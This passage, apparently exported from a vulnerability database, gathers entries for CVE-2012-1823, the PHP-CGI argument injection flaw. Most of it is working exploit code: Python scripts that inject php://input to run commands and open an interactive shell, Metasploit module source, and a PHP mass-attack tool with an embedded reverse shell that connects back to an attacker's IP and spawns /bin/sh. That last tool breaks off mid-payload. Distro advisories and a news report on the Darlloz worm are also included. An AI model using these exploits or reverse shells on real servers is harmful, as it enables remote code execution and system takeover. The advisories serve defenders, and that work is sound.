'(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)'; \nglobal $proxy, $host, $port, $html, $user, $pass; \nif ($proxy == '') \n{ \n$ock = fsockopen($host,$port); \nstream_set_timeout($ock, 5); \nif (!$ock) \n{ \necho 'No response from '.htmlentities($host).' ...<br>'; \nstream_set_timeout($ock, 4); \n} \n} else \n{ \n$parts = explode(':',$proxy); \n// echo '<font color=white>Connecting to proxy: \n'.$parts[0].':'.$parts[1].' ...<br><br/></font>'; \n$ock = fsockopen($parts[0],$parts[1]); \nstream_set_timeout($ock, 5); \nif (!$ock) \n{ \necho 'No response from proxy...<br>'; \nfclose($ock); \n} \n} \n \nif ($ock) \n{ \nfputs($ock,$packet); \nif ($response == 1) \n{ \nif ($proxy == '') \n{ \n$html = ''; \nwhile (!feof($ock)) \n{ \n$html .= fgets($ock); \n} \n} else \n{ \n$html = ''; \nwhile ((!feof($ock)) or \n(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) \n{ \n$html .= fread($ock,1); \n} \n} \n} else $html = ''; \n \nfclose($ock); \n} \n} \n?> \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/112971/phpcgi-exploit.txt"}, {"lastseen": "2016-12-05T22:25:20", "description": "", "published": "2012-05-06T00:00:00", "type": "packetstorm", "title": "PHP CGI Injection ", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1823"], "modified": "2012-05-06T00:00:00", "id": "PACKETSTORM:112486", "href": "https://packetstormsecurity.com/files/112486/PHP-CGI-Injection.html", "sourceData": "`###################################################################################### \n# Exploit Title: Cve-2012-1823 PHP CGI Argument Injection Exploit \n# Date: May 4, 2012 \n# Author: rayh4c[0x40]80sec[0x2e]com \n# Exploit Discovered by wofeiwo[0x40]80sec[0x2e]com \n###################################################################################### \n \nimport socket \nimport sys \n \ndef cgi_exploit(): \npwn_code = \"\"\"<?php phpinfo();?>\"\"\" \npost_Length = len(pwn_code) \nhttp_raw=\"\"\"POST /?-dallow_url_include%%3don+-dauto_prepend_file%%3dphp://input HTTP/1.1 \nHost: %s \nContent-Type: application/x-www-form-urlencoded \nContent-Length: %s \n \n%s \n\"\"\" %(HOST , post_Length ,pwn_code) \nprint http_raw \ntry: \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nsock.connect((HOST, int(PORT))) \nsock.send(http_raw) \ndata = sock.recv(10000) \nprint repr(data) \nsock.close() \nexcept socket.error, msg: \nsys.stderr.write(\"[ERROR] %s\\n\" % msg[1]) \nsys.exit(1) \n \nif __name__ == '__main__': \ntry: \nHOST = sys.argv[1] \nPORT = sys.argv[2] \ncgi_exploit() \nexcept IndexError: \nprint '[+]Usage: cgi_test.py site.com 80' \nsys.exit(-1) \n \n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/112486/phpcgi-inject.txt"}, {"lastseen": "2016-12-05T22:23:14", "description": "", "published": "2012-12-24T00:00:00", "type": "packetstorm", "title": "PHP-CGI Argument Injection Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1823"], "modified": "2012-12-24T00:00:00", "id": "PACKETSTORM:119075", "href": "https://packetstormsecurity.com/files/119075/PHP-CGI-Argument-Injection-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/python \nimport requests \nimport sys \n \nprint \"\"\" \nCVE-2012-1823 PHP-CGI Arguement Injection Remote Code Execution \nThis exploit abuses an arguement injection in the PHP-CGI wrapper \nto execute code as the PHP user/webserver user. \nFeel free to give me abuse about this <3 \n- infodox | insecurety.net | @info_dox \n\"\"\" \n \nif len(sys.argv) != 2: \nprint \"Usage: ./cve-2012-1823.py <target>\" \nsys.exit(0) \n \ntarget = sys.argv[1] \nurl = \"\"\"http://\"\"\" + target + \"\"\"/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input\"\"\" \nlol = \"\"\"<?php system('\"\"\" \nlol2 = \"\"\"');die(); ?>\"\"\" \nprint \"[+] Connecting and spawning a shell...\" \nwhile True: \ntry: \nbobcat = raw_input(\"%s:~$ \" %(target)) \nlulz = lol + bobcat + lol2 \nhax = requests.post(url, lulz) \nprint hax.text \nexcept KeyboardInterrupt: \nprint \"\\n[-] Quitting\" \nsys.exit(1) \n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/119075/cve-2012-1823.py.txt"}], "seebug": [{"lastseen": "2017-11-19T15:53:29", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "PHP CGI Argument Injection", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1823"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-72859", "id": "SSV:72859", "sourceData": "\n ##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire &#39;msf/core&#39;\r\n\r\nclass Metasploit3 &#60; Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t&#39;Name&#39; =&#62; &#39;PHP CGI Argument Injection&#39;,\r\n\t\t\t&#39;Description&#39; =&#62; %q{\r\n\t\t\t\tWhen run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to\r\n\t\t\t\tan argument injection vulnerability. This module takes advantage of\r\n\t\t\t\tthe -d flag to set php.ini directives to achieve code execution.\r\n\t\t\t\tFrom the advisory: &#34;if there is NO unescaped &#39;=&#39; in the query string,\r\n\t\t\t\tthe string is split on &#39;+&#39; (encoded space) characters, urldecoded,\r\n\t\t\t\tpassed to a function that escapes shell metacharacters (the &#34;encoded in\r\n\t\t\t\ta system-defined manner&#34; from the RFC) and then passes them to the CGI\r\n\t\t\t\tbinary.&#34;\r\n\t\t\t},\r\n\t\t\t&#39;Author&#39; =&#62; [ &#39;egypt&#39;, &#39;hdm&#39; ],\r\n\t\t\t&#39;License&#39; =&#62; MSF_LICENSE,\r\n\t\t\t&#39;Version&#39; =&#62; &#39;$Revision$&#39;,\r\n\t\t\t&#39;References&#39; =&#62; [\r\n\t\t\t\t\t[ &#34;CVE&#34;\t, &#34;2012-1823&#34; ],\r\n\t\t\t\t\t[ &#34;URL&#34;\t, &#34;http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/&#34; ],\r\n\t\t\t\t],\r\n\t\t\t&#39;Privileged&#39; =&#62; false,\r\n\t\t\t&#39;Payload&#39; =&#62;\r\n\t\t\t\t{\r\n\t\t\t\t\t&#39;DisableNops&#39; =&#62; true,\r\n\t\t\t\t\t# Arbitrary big number. The payload gets sent as an HTTP\r\n\t\t\t\t\t# response body, so really it&#39;s unlimited\r\n\t\t\t\t\t&#39;Space&#39; =&#62; 262144, # 256k\r\n\t\t\t\t},\r\n\t\t\t&#39;DisclosureDate&#39; =&#62; &#39;May 03 2012&#39;,\r\n\t\t\t&#39;Platform&#39; =&#62; &#39;php&#39;,\r\n\t\t\t&#39;Arch&#39; =&#62; ARCH_PHP,\r\n\t\t\t&#39;Targets&#39; =&#62; [[ &#39;Automatic&#39;, { }]],\r\n\t\t\t&#39;DefaultTarget&#39; =&#62; 0))\r\n\r\n\t\tregister_options([\r\n\t\t\tOptString.new(&#39;TARGETURI&#39;, [false, &#34;The URI to request (must be a CGI-handled PHP script)&#34;]),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\t# php-cgi -h\r\n\t# ...\r\n\t# -s Display colour syntax highlighted source.\r\n\tdef check\r\n\t\turi = target_uri.path\r\n\r\n\t\turi.gsub!(/\\?.*/, &#34;&#34;)\r\n\r\n\t\tprint_status(&#34;Checking uri #{uri}&#34;)\r\n\r\n\t\tresponse = send_request_raw({ &#39;uri&#39; =&#62; uri })\r\n\r\n\t\tif response and response.code == 200 and response.body =~ /\\&#60;code\\&#62;\\&#60;span style.*\\&lt\\;\\?/mi\r\n\t\t\tprint_error(&#34;Server responded in a way that was ambiguous, could not determine whether it was vulnerable&#34;)\r\n\t\t\treturn Exploit::CheckCode::Unknown\r\n\t\tend\r\n\r\n\t\tresponse = send_request_raw({ &#39;uri&#39; =&#62; uri + &#39;?-s&#39;})\r\n\t\tif response and response.code == 200 and response.body =~ /\\&#60;code\\&#62;\\&#60;span style.*\\&lt\\;\\?/mi\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\r\n\t\tprint_error(&#34;Server responded indicating it was not vulnerable&#34;)\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tbegin\r\n\t\t\targs = [\r\n\t\t\t\t&#34;-d+allow_url_include%3d#{rand_php_ini_true}&#34;,\r\n\t\t\t\t&#34;-d+safe_mode%3d#{rand_php_ini_false}&#34;,\r\n\t\t\t\t&#34;-d+suhosin.simulation%3d#{rand_php_ini_true}&#34;,\r\n\t\t\t\t&#34;-d+disable_functions%3d%22%22&#34;,\r\n\t\t\t\t&#34;-d+open_basedir%3dnone&#34;,\r\n\t\t\t\t&#34;-d+auto_prepend_file%3dphp://input&#34;,\r\n\t\t\t\t&#34;-n&#34;\r\n\t\t\t]\r\n\r\n\t\t\tqs = args.join(&#34;+&#34;)\r\n\t\t\turi = &#34;#{target_uri}?#{qs}&#34;\r\n\r\n\t\t\t# Has to be all on one line, so gsub out the comments and the newlines\r\n\t\t\tpayload_oneline = &#34;&#60;?php &#34; + payload.encoded.gsub(/\\s*#.*$/, &#34;&#34;).gsub(&#34;\\n&#34;, &#34;&#34;)\r\n\t\t\tresponse = send_request_cgi( {\r\n\t\t\t\t&#39;method&#39; =&#62; &#34;POST&#34;,\r\n\t\t\t\t&#39;global&#39; =&#62; true,\r\n\t\t\t\t&#39;uri&#39; =&#62; uri,\r\n\t\t\t\t&#39;data&#39; =&#62; payload_oneline,\r\n\t\t\t}, 0.5)\r\n\t\t\thandler\r\n\r\n\t\trescue ::Interrupt\r\n\t\t\traise $!\r\n\t\trescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused\r\n\t\t\tprint_error(&#34;The target service unreachable&#34;)\r\n\t\trescue ::OpenSSL::SSL::SSLError\r\n\t\t\tprint_error(&#34;The target failed to negotiate SSL, is this really an SSL service?&#34;)\r\n\t\tend\r\n\r\n\tend\r\n\r\n\tdef rand_php_ini_false\r\n\t\tRex::Text.to_rand_case([ &#34;0&#34;, &#34;off&#34;, &#34;false&#34; ][rand(3)])\r\n\tend\r\n\r\n\tdef rand_php_ini_true\r\n\t\tRex::Text.to_rand_case([ &#34;1&#34;, &#34;on&#34;, &#34;true&#34; ][rand(3)])\r\n\tend\r\n\r\nend\r\n\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-72859"}], "centos": [{"lastseen": "2019-12-20T18:29:37", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823"], "description": "**CentOS Errata and Security Advisory** CESA-2012:0547\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command line\narguments when running in CGI mode. A remote attacker could send a \nspecially-crafted request to a PHP script that would result in the query\nstring being parsed by php-cgi as command line options and arguments. This \ncould lead to the disclosure of the script's source code or arbitrary code \nexecution with the privileges of the PHP interpreter. (CVE-2012-1823) \n\nRed Hat is aware that a public exploit for this issue is available that \nallows remote code execution in affected PHP CGI configurations. This flaw \ndoes not affect the default configuration using the PHP module for Apache \nhttpd to handle PHP scripts.\n\nAll php53 users should upgrade to these updated packages, which contain a\nbackported patch to resolve this issue. After installing the updated\npackages, the httpd daemon must be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-May/030655.html\n\n**Affected packages:**\nphp53\nphp53-bcmath\nphp53-cli\nphp53-common\nphp53-dba\nphp53-devel\nphp53-gd\nphp53-imap\nphp53-intl\nphp53-ldap\nphp53-mbstring\nphp53-mysql\nphp53-odbc\nphp53-pdo\nphp53-pgsql\nphp53-process\nphp53-pspell\nphp53-snmp\nphp53-soap\nphp53-xml\nphp53-xmlrpc\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0547.html", "edition": 3, "modified": "2012-05-07T23:01:16", "published": "2012-05-07T23:01:16", "href": "http://lists.centos.org/pipermail/centos-announce/2012-May/030655.html", "id": "CESA-2012:0547", "title": "php53 security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:47:03", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823"], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command line\narguments when running in CGI mode. A remote attacker could send a\nspecially-crafted request to a PHP script that would result in the query\nstring being parsed by php-cgi as command line options and arguments. This\ncould lead to the disclosure of the script's source code or arbitrary code\nexecution with the privileges of the PHP interpreter. (CVE-2012-1823)\n\nRed Hat is aware that a public exploit for this issue is available that\nallows remote code execution in affected PHP CGI configurations. This flaw\ndoes not affect the default configuration in Red Hat Enterprise Linux 5 and\n6 using the PHP module for Apache httpd to handle PHP scripts.\n\nAll php users should upgrade to these updated packages, which contain a\nbackported patch to resolve this issue. After installing the updated\npackages, the httpd daemon must be restarted for the update to take effect.\n", "modified": "2017-09-08T12:08:16", "published": "2012-05-10T04:00:00", "id": "RHSA-2012:0568", "href": "https://access.redhat.com/errata/RHSA-2012:0568", "type": "redhat", "title": "(RHSA-2012:0568) Critical: php security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:56", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823"], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command line\narguments when running in CGI mode. A remote attacker could send a\nspecially-crafted request to a PHP script that would result in the query\nstring being parsed by php-cgi as command line options and arguments. This\ncould lead to the disclosure of the script's source code or arbitrary code\nexecution with the privileges of the PHP interpreter. (CVE-2012-1823)\n\nRed Hat is aware that a public exploit for this issue is available that\nallows remote code execution in affected PHP CGI configurations. This flaw\ndoes not affect the default configuration using the PHP module for Apache\nhttpd to handle PHP scripts.\n\nAll php53 users should upgrade to these updated packages, which contain a\nbackported patch to resolve this issue. After installing the updated\npackages, the httpd daemon must be restarted for the update to take effect.\n", "modified": "2017-09-08T12:09:34", "published": "2012-05-10T04:00:00", "id": "RHSA-2012:0569", "href": "https://access.redhat.com/errata/RHSA-2012:0569", "type": "redhat", "title": "(RHSA-2012:0569) Critical: php53 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2018-01-27T09:17:56", "bulletinFamily": "info", "cvelist": ["CVE-2012-1823"], "description": "[](<https://4.bp.blogspot.com/-XAsXMXrVRn4/Uyqy3GL-9EI/AAAAAAAAatg/T1_l1UZYSNI/s1600/Linux-malware-Internet-of-Things-security-app.png>)\n\nCould a perfectly innocent looking device like router, TV set-top box or security cameras can mine Bitcoins? YES! Hackers will not going to spare the Smart Internet-enabled devices.\n\n \n\n\nA Linux worm named **_Linux.Darlloz_**, earlier used to target _Internet of Things (IoT)_ devices, i.e. Home Routers, Set-top boxes, Security Cameras, printers and Industrial control systems; now have been upgraded to mine Crypto Currencies like Bitcoin.\n\n \n\n\nSecurity Researcher at Antivirus firm [Symantec](<http://www.symantec.com/connect/blogs/iot-worm-used-mine-cryptocurrency>) spotted the Darlloz Linux worm back in November and they have spotted the latest variant of the worm in mid-January this year.\n\n \n\n\n_Linux.Darlloz_ worm exploits a PHP vulnerability (__[CVE-2012-1823](<https://thehackernews.com/2013/11/Linux-ELF-malware-php-cgi-vulnerability.html>)__) to propagate and is capable to infect devices those run Linux on Intel\u2019s x86 chip architecture and other embedded device architectures such as PPC, MIPS and MIPSEL.\n\n \n\n\nThe latest variant of _Linux.Darlloz_ equipped with an open source crypto currency mining tool called '_[cpuminer](<https://sourceforge.net/projects/cpuminer/>)_', could be used to mine Mincoins, Dogecoins or [Bitcoins](<https://thehackernews.com/search/label/Bitcoin>).\n\n \n\n\nSymantec Researchers scanned the entire address space of the Internet and found 31,716 devices infected with Darlloz. \"_By the end of February 2014, the attacker mined 42,438 Dogecoins (approximately US$46 at the time of writing) and 282 Mincoins (approximately US$150 at the time of writing). These amounts are relatively low for the average cybercrime activity so, we expect the attacker to continue to evolve their threat for increased monetization._\" Kaoru Hayashi, senior development manager and threat analyst with Symantec in Japan.\n\n \n\n\nMajor infected countries are China, the U.S., South Korea, Taiwan and India.\n\n[](<https://1.bp.blogspot.com/-EtVgrEz1c3o/UyqcCffn2-I/AAAAAAAAas8/tx2Irf9tGFA/s1600/Darlloz-hack-malware.png>)\n\nCrypto Currency typically requires more memory and a powerful CPUs, so the [malware](<https://thehackernews.com/search/label/Malware>) could be updated to target other IoT devices in the future, such as home automation devices and wearable technology. \n \nA Few weeks back, Cisco has announced a global and industry-wide initiative to bring the Security community and Researchers together to contribute in securing the Internet of Things (IoT) and launched a contest called the \"**[Internet of Things Grand Security Challenge](<https://thehackernews.com/2014/03/Internet-of-Things-Security-Apps.html>)**\", offering prizes of up to $300,000 for winners.\n\n \n\n\nUsers are advised to update firmware and apply security patches for all software installed on computers or Internet-enabled devices. Make sure, you are not using default username or password for all devices and block port 23 or 80 from outside if not required.\n", "modified": "2014-03-20T09:28:58", "published": "2014-03-19T22:26:00", "id": "THN:26139DCDB80F29AA56F9DB9ADFBD986B", "href": "https://thehackernews.com/2014/03/linux-worm-targets-internet-enabled.html", "type": "thn", "title": "Linux Worm targets Internet-enabled Home appliances to Mine Cryptocurrencies", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-01-08T18:01:12", "bulletinFamily": "info", "cvelist": ["CVE-2012-1823"], "description": "None\n", "modified": "2013-11-30T20:08:11", "published": "2013-11-30T09:08:00", "id": "THN:F0587F0EFE1B937682CDBA5338BDE708", "href": "http://thehackernews.com/2013/11/Linux-ELF-malware-php-cgi-vulnerability.html", "type": "thn", "title": "Linux worm targeting Routers, Set-top boxes and Security Cameras with PHP-CGI Vulnerability", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:44", "bulletinFamily": "software", "cvelist": ["CVE-2012-1823"], "description": "&lt;?php\r\n\r\n######################################### www.bugreport.ir \r\n########################################\r\n#\r\n# Title: PHP CGI Argument Injection Remote Exploit \r\nV0.3 - PHP Version\r\n# Vendor: http://www.php.net\r\n# Vulnerable Version: PHP up to version 5.3.12 and 5.4.2\r\n# Exploitation: Remote\r\n# Original Advisory: \r\nhttp://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/\r\n# Original Exploit URL: http://www.bugreport.ir/79/exploit.htm\r\n# CVE: CVE-2012-1823\r\n# Coded By: Mostafa Azizi &#40;admin[@]0-Day[dot]net&#41;\r\n###################################################################################################\r\n\r\n/* This tool may be used for legal purposes only. Users take full \r\nresponsibility for any actions performed using this tool.\r\nThe author accepts no liability for damage caused by this tool. If \r\nthese terms are not acceptable to you, then do not use this tool.*/\r\n\r\nerror_reporting&#40;0&#41;;\r\nini_set&#40;&quot;max_execution_time&quot;,0&#41;;\r\nini_set&#40;&quot;default_socket_timeout&quot;, 10&#41;;\r\nob_implicit_flush &#40;1&#41;;\r\n\r\necho&#39;&lt;html&gt;\r\n&lt;head&gt;\r\n&lt;title&gt;PHP CGI Argument Injection Remote Exploit&lt;/title&gt;\r\n&lt;/head&gt;\r\n&lt;p align=&quot;center&quot;&gt;&lt;font size=&quot;4&quot; color=&quot;#5E767E&quot;&gt;PHP CGI Argument \r\nInjection&lt;/font&gt;&lt;/p&gt;\r\n&lt;p align=&quot;center&quot;&gt;&lt;font size=&quot;3&quot; color=&quot;#4E8975&quot;&gt;Coded by: Mostafa \r\nAzizi &#40;admin[@]0-Day[dot]net&#41;&lt;/font&gt;&lt;/p&gt;\r\n&lt;body bgcolor=&quot;#00000&quot;&gt;\r\n&lt;table align=&quot;center&quot; border=&quot;5&quot;&gt;\r\n&lt;tr&gt;\r\n &lt;th&gt;&lt;p align=&quot;center&quot;&gt;&lt;font size=&quot;4&quot; color=&quot;#8BB381&quot;&gt;Mass File \r\nUploader&lt;/font&gt;&lt;/p&gt;\r\n&lt;/th&gt;\r\n&lt;th&gt;&lt;/th&gt;\r\n &lt;th&gt;&lt;p align=&quot;center&quot;&gt;&lt;font size=&quot;4&quot; color=&quot;#8BB381&quot;&gt;Reverse \r\nShell&lt;/font&gt;&lt;/p&gt;\r\n&lt;/th&gt;\r\n &lt;/tr&gt;\r\n&lt;tr&gt;\r\n &lt;td&gt;&lt;form name=&quot;form1&quot; action=&quot;&#39;.$SERVER[PHP_SELF].&#39;&quot; \r\nenctype=&quot;multipart/form-data&quot; method=&quot;post&quot;&gt;\r\n &lt;/br&gt;\r\n &lt;p&gt;&lt;/font&gt;&lt;font color=&quot;#FFF8C6&quot; &gt;Please specify a file to \r\nscan: &lt;/font&gt;&lt;/br&gt;&lt;input type=&quot;file&quot; name=&quot;listfile&quot; \r\nsize=&quot;40&quot;&gt;&lt;font color=&quot;#FF0000&quot;&gt; * &lt;/font&gt;\r\n &lt;p&gt;&lt;/font&gt;&lt;font color=&quot;#FFF8C6&quot; &gt;Please specify a file to \r\nupload: &lt;/font&gt;&lt;/br&gt;&lt;input type=&quot;file&quot; name=&quot;datafile&quot; \r\nsize=&quot;40&quot;&gt;&lt;font color=&quot;#FF0000&quot;&gt; * &lt;/font&gt;\r\n &lt;p&gt;&lt;font color=&quot;#FFF8C6&quot; &gt; specify a port &#40;default is 80&#41;: \r\n &lt;/font&gt;&lt;/br&gt;&lt;input name=&quot;port&quot; size=&quot;20&quot;&gt;&lt;span \r\nclass=&quot;Stile5&quot;&gt;&lt;/span&gt;&lt;/p&gt;\r\n &lt;p&gt;&lt;font color=&quot;#FFF8C6&quot; &gt; Proxy &#40;ip:port&#41;: \r\n &lt;/font&gt;&lt;/br&gt;&lt;input name=&quot;proxy&quot; size=&quot;20&quot;&gt;&lt;span \r\nclass=&quot;Stile5&quot;&gt;&lt;/span&gt;&lt;/p&gt;\r\n &lt;p align=&quot;center&quot;&gt; &lt;span class=&quot;Stile5&quot;&gt;&lt;font \r\ncolor=&quot;#FF0000&quot;&gt;* &lt;/font&gt;&lt;font color=&quot;white&quot; &gt;fields are \r\nrequired&lt;/font&gt;&lt;/font&gt;&lt;/span&gt;&lt;/p&gt;\r\n &lt;/br&gt;\r\n &lt;p align=&quot;center&quot;&gt;&lt;input type=&quot;submit&quot; value=&quot;Start Attack&quot; \r\nname=&quot;Submit&quot;&gt;&lt;/p&gt;\r\n &lt;/form&gt; &lt;/td&gt;\r\n &lt;td&gt;&lt;/td&gt;\r\n &lt;td&gt;&lt;form name=&quot;form1&quot; action=&quot;&#39;.$SERVER[PHP_SELF].&#39;&quot; \r\nenctype=&quot;multipart/form-data&quot; method=&quot;post&quot;&gt;\r\n &lt;/br&gt;\r\n &lt;p&gt;&lt;/font&gt;&lt;font color=&quot;#FFF8C6&quot; &gt; hostname &#40;ex: \r\nwww.sitename.com&#41;:&lt;/font&gt;&lt;/br&gt;&lt;input name=&quot;host&quot; size=&quot;20&quot;&gt; &lt;span \r\nclass=&quot;Stile5&quot;&gt;&lt;/span&gt;&lt;/p&gt;\r\n &lt;p&gt;&lt;/font&gt;&lt;font color=&quot;#FFF8C6&quot; &gt; Your IP &#40;ex: \r\n173.194.35.169 &#41;: &lt;/font&gt;&lt;/br&gt;&lt;input name=&quot;lip&quot; size=&quot;20&quot;&gt; \r\n&lt;span class=&quot;Stile5&quot;&gt;&lt;/span&gt;&lt;/p&gt;\r\n &lt;p&gt;&lt;font color=&quot;#FFF8C6&quot; &gt; Your Port &#40;ex: \r\n80&#41;:&lt;/font&gt;&lt;/br&gt;&lt;input name=&quot;lport&quot; size=&quot;20&quot;&gt; &lt;span \r\nclass=&quot;Stile5&quot;&gt;&lt;/span&gt;&lt;/p&gt;\r\n &lt;/br&gt;&lt;/br&gt;\r\n &lt;p align=&quot;center&quot;&gt; &lt;span class=&quot;Stile5&quot;&gt;&lt;font \r\ncolor=&quot;#FF0000&quot;&gt;All &lt;/font&gt;&lt;font color=&quot;white&quot; &gt;fields are \r\nrequired&lt;/font&gt;&lt;/font&gt;&lt;/span&gt;&lt;/p&gt;\r\n &lt;/br&gt;\r\n &lt;p align=&quot;center&quot;&gt;&lt;input type=&quot;submit&quot; value=&quot;Start Attack&quot; \r\nname=&quot;Submit2&quot;&gt;&lt;/p&gt;\r\n &lt;/form&gt; &lt;/td&gt;\r\n &lt;/tr&gt;\r\n&lt;/table&gt;\r\n&lt;/font&gt;\r\n&lt;table width=&quot;90&#37;&quot;&gt;\r\n &lt;tbody&gt;\r\n &lt;tr&gt;\r\n &lt;td width=&quot;43&#37;&quot; align=&quot;left&quot;&gt;\r\n\r\n &lt;/td&gt;\r\n &lt;/tr&gt;\r\n &lt;/tbody&gt;\r\n&lt;/table&gt;\r\n&lt;/body&gt;&lt;/html&gt;&#39;;\r\n\r\n $host = $_POST[&#39;host&#39;];\r\n $lip = $_POST[&#39;lip&#39;];\r\n $lport = $_POST[&#39;lport&#39;];\r\n $port = $_POST[&#39;port&#39;];\r\n $proxy = $_POST[&#39;proxy&#39;];\r\n $list = file&#40;$_FILES[&#39;listfile&#39;][&#39;tmp_name&#39;]&#41;;\r\n $file = \r\nbase64_encode&#40;gzdeflate&#40;file_get_contents&#40;$_FILES[&#39;datafile&#39;][&#39;tmp_name&#39;]&#41;&#41;&#41;;\r\n $shell = &quot;gzinflate&#40;base64_decode&#40;&#92;&quot;$file&#92;&quot;&#41;&#41;&quot;;\r\n\r\nif &#40;isset&#40;$_POST[&#39;Submit2&#39;]&#41; &amp;&amp; $host != &#39;&#39; &amp;&amp; $lip != &#39;&#39; &amp;&amp; $lport != &#39;&#39;&#41;\r\n{\r\n /*pentestmonkey&#39;s php-reverse-shell.\r\n Limitations: proc_open and stream_set_blocking require PHP version \r\n4.3+, or 5+ */\r\n\r\n /* Connect Back */\r\n\r\n $payload = &quot;&lt;?php set_time_limit &#40;0&#41;; &#92;$VERSION = &#92;&quot;1.0&#92;&quot;; &#92;$ip = \r\n&#39;$lip&#39;; &#92;$port = $lport; &#92;$chunk_size = 1400; &#92;$write_a = null; \r\n&#92;$error_a = null; &#92;$shell = &#39;uname -a; w; id; /bin/sh -i&#39;; &#92;$daemon = \r\n0;&#92;$debug = 0; if &#40;function_exists&#40;&#39;pcntl_fork&#39;&#41;&#41; { &#92;$pid = \r\npcntl_fork&#40;&#41;; if &#40;&#92;$pid == -1&#41; { printit&#40;&#92;&quot;ERROR: Can&#39;t fork&#92;&quot;&#41;; \r\nexit&#40;1&#41;;} if &#40;&#92;$pid&#41; { exit&#40;0&#41;;} if &#40;posix_setsid&#40;&#41; == -1&#41; { \r\nprintit&#40;&#92;&quot;Error: Can&#39;t setsid&#40;&#41;&#92;&quot;&#41;; exit&#40;1&#41;; } &#92;$daemon = 1;} else { \r\nprintit&#40;&#92;&quot;WARNING: Failed to daemonise. This is quite common and not \r\nfatal.&#92;&quot;&#41;;}chdir&#40;&#92;&quot;/&#92;&quot;&#41;; umask&#40;0&#41;; &#92;$sock = fsockopen&#40;&#92;$ip, &#92;$port, \r\n&#92;$errno, &#92;$errstr, 30&#41;;if &#40;!&#92;$sock&#41; { printit&#40;&#92;&quot;&#92;$errstr &#40;&#92;$errno&#41;&#92;&quot;&#41;; \r\nexit&#40;1&#41;;} &#92;$descriptorspec = array&#40;0 =&gt; array&#40;&#92;&quot;pipe&#92;&quot;, &#92;&quot;r&#92;&quot;&#41;,1 =&gt; \r\narray&#40;&#92;&quot;pipe&#92;&quot;, &#92;&quot;w&#92;&quot;&#41;, 2 =&gt; array&#40;&#92;&quot;pipe&#92;&quot;, &#92;&quot;w&#92;&quot;&#41;&#41;;&#92;$process = \r\nproc_open&#40;&#92;$shell, &#92;$descriptorspec, &#92;$pipes&#41;;if \r\n&#40;!is_resource&#40;&#92;$process&#41;&#41; { printit&#40;&#92;&quot;ERROR: Can&#39;t spawn shell&#92;&quot;&#41;; \r\nexit&#40;1&#41;;}stream_set_blocking&#40;&#92;$pipes[0], \r\n0&#41;;stream_set_blocking&#40;&#92;$pipes[1], 0&#41;;stream_set_blocking&#40;&#92;$pipes[2], \r\n0&#41;;stream_set_blocking&#40;&#92;$sock, 0&#41;;printit&#40;&#92;&quot;Successfully opened \r\nreverse shell to &#92;$ip:&#92;$port&#92;&quot;&#41;; while &#40;1&#41; { if &#40;feof&#40;&#92;$sock&#41;&#41; 